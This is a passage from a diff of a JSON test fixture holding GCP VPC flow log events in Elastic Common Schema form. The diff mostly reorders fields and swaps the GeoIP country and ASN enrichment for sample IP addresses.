"event", - "start": "2019-06-14T03:44:07.689331553Z", - "end": "2019-06-14T03:44:07.811355936Z", - "id": "bxuq05fhgmw98", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -13944,11 +14647,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 39568, @@ -13956,6 +14664,16 @@ "ip": "67.43.156.13", "packets": 2400 }, + "event": { + "ingested": "2021-12-14T14:43:27.415246554Z", + "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.480787267Z", + "end": "2019-06-14T03:49:02.085146013Z", + "id": "bxuq05fhgmw96", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -13967,19 +14685,30 @@ "iana_number": "6", "packets": 2400, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 15 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -13990,36 +14719,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 15 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391955900Z", - "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.480787267Z", - "end": "2019-06-14T03:49:02.085146013Z", - "id": "bxuq05fhgmw96", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 39568, @@ -14033,6 +14746,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415246958Z", + "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.480787267Z", + "end": "2019-06-14T03:49:02.085146013Z", + "id": "bxuq05fhgmw99", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14044,22 +14767,27 @@ "iana_number": "6", "packets": 1340, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 15 + "ms": 40 } }, "source": { @@ -14075,21 +14803,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391961400Z", - "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.480787267Z", - "end": "2019-06-14T03:49:02.085146013Z", - "id": "bxuq05fhgmw99", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", @@ -14110,6 +14823,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415247377Z", + "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:08.995009558Z", + "end": "2019-06-14T03:49:09.114674887Z", + "id": "bxuq05fhgmw93", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14121,46 +14844,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:16.593Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "192.168.2.117" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 40 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391967100Z", - "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:08.995009558Z", - "end": "2019-06-14T03:49:09.114674887Z", - "id": "bxuq05fhgmw93", - "category": "network", - "type": "connection" } }, { @@ -14169,11 +14852,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14251,7 +14939,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391971100Z", + "ingested": "2021-12-14T14:43:27.415247798Z", "original": "{\"insertId\":\"bxuq05fhgmw9f\",\"jsonPayload\":{\"bytes_sent\":\"9611\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"101\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", @@ -14267,11 +14955,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14346,7 +15039,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391975Z", + "ingested": "2021-12-14T14:43:27.415248295Z", "original": "{\"insertId\":\"bxuq05fhgmw9j\",\"jsonPayload\":{\"bytes_sent\":\"318481\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"181\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", @@ -14368,11 +15061,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14444,7 +15142,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391978400Z", + "ingested": "2021-12-14T14:43:27.415248700Z", "original": "{\"insertId\":\"bxuq05fhgmw97\",\"jsonPayload\":{\"bytes_sent\":\"139359\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"70\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", @@ -14455,22 +15153,57 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.593Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } + } + }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 60640, @@ -14478,6 +15211,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415249090Z", + "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:50.830164366Z", + "end": "2019-06-14T03:42:50.942543211Z", + "id": "bxuq05fhgmw9i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14489,19 +15232,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.139.99.242", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 1350 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -14512,38 +15266,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391982100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:50.830164366Z", - "end": "2019-06-14T03:42:50.942543211Z", - "id": "bxuq05fhgmw9i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 4837 + "number": 35908 }, "address": "67.43.156.14", "port": 41818, @@ -14557,6 +15293,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415249768Z", + "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:11.031370298Z", + "end": "2019-06-14T03:43:16.809366809Z", + "id": "bxuq05fhgmw9c", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14568,22 +15314,27 @@ "iana_number": "6", "packets": 9, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.14" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 1350 + "ms": 36 } }, "source": { @@ -14599,28 +15350,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391986700Z", - "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:11.031370298Z", - "end": "2019-06-14T03:43:16.809366809Z", - "id": "bxuq05fhgmw9c", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60640, @@ -14634,6 +15375,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415250662Z", + "original": "{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:50.830164366Z", + "end": "2019-06-14T03:42:50.942543211Z", + "id": "bxuq05fhgmw9h", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14645,46 +15396,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:16.593Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391990500Z", - "original": 